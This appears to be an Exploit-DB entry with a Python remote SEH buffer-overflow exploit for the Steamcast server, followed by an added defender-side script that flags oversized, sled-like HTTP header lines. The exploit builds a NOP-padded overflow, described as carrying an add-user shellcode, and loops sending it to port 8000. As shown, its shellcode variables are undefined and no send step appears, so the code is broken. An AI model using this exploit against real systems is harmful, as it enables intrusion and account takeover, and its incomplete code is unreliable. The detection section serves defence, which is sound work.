Steamcast - HTTP Request Remote Buffer Overflow Exploit SEH 2

ID EDB-ID:8422
Type exploitdb
Reporter His0k4
Modified 2009-04-13T00:00:00


Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]. Remote exploit for the Windows platform.

#[*] Usage   : [victim_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Found by : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),,
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs small shellcodes only; this one is the opposite :)
#Note : The problem is that we need to find a DLL which is not compiled with /GS. In my case I found idmmbc, a DLL loaded by Internet Download Manager, so try to find an unsafe DLL.
#Other note : The shellcode will be executed when the program is closed.
#Another one : If you have problems running the exploit, msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1] 
port = 8000

# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub


exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt

#It needs a loop to work
while 1:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, port))
	head =  "GET / HTTP/1.1\r\n"
	head += "Host: "+host+"\r\n"
	head += exploit+"\r\n"
	head += "\r\n\r\n"
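
Added example, not part of the original exploit or of Steamcast: a defender-side check that flags HTTP requests shaped like the one above (a header line of roughly a kilobyte, no field-name separator, non-printable bytes, a long run of one byte) so the pattern can be caught at a proxy, in an IDS rule prototype or while triaging captures. The thresholds MAX_HEADER_LINE and MIN_SLED_RUN and the sample requests are assumptions constructed for the example.

```python
import re

MAX_HEADER_LINE = 512   # assumption: legitimate Steamcast clients send far shorter header lines
MIN_SLED_RUN = 64       # assumption: 64+ identical consecutive bytes is treated as a sled


def inspect_http_request(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request; an empty list means nothing suspicious."""
    findings = []
    head, _, _ = raw.partition(b"\r\n\r\n")   # headers only, body (if any) is ignored
    lines = head.split(b"\r\n")
    for idx, line in enumerate(lines):
        if idx == 0 or not line:
            continue   # skip the request line (e.g. b"GET / HTTP/1.1") and empty lines
        if len(line) > MAX_HEADER_LINE:
            findings.append(f"header line {idx} is {len(line)} bytes (limit {MAX_HEADER_LINE})")
        if b":" not in line:
            # every header field needs a name/value separator (obsolete line folding is not handled here)
            findings.append(f"header line {idx} has no ':' separator")
        nonprint = sum(1 for b in line if b < 0x20 or b > 0x7E)
        if nonprint:
            findings.append(f"header line {idx} contains {nonprint} non-printable bytes")
        # a long run of one byte value is typical of padding / NOP sleds
        run = re.search(rb"(.)\1{%d,}" % (MIN_SLED_RUN - 1), line, re.DOTALL)
        if run:
            findings.append(
                f"header line {idx} has a {len(run.group(0))}-byte run of 0x{run.group(1)[0]:02x}"
            )
    return findings


# Constructed samples (not captured traffic): a normal listener request and an oversized one
BENIGN = b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: WinampMPEG/5.0\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.1\r\nHost: 192.0.2.10\r\n" + b"\x90" * 1003 + b"A" * 40 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, inspect_http_request(req) or "clean")
```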


# [2009-04-13]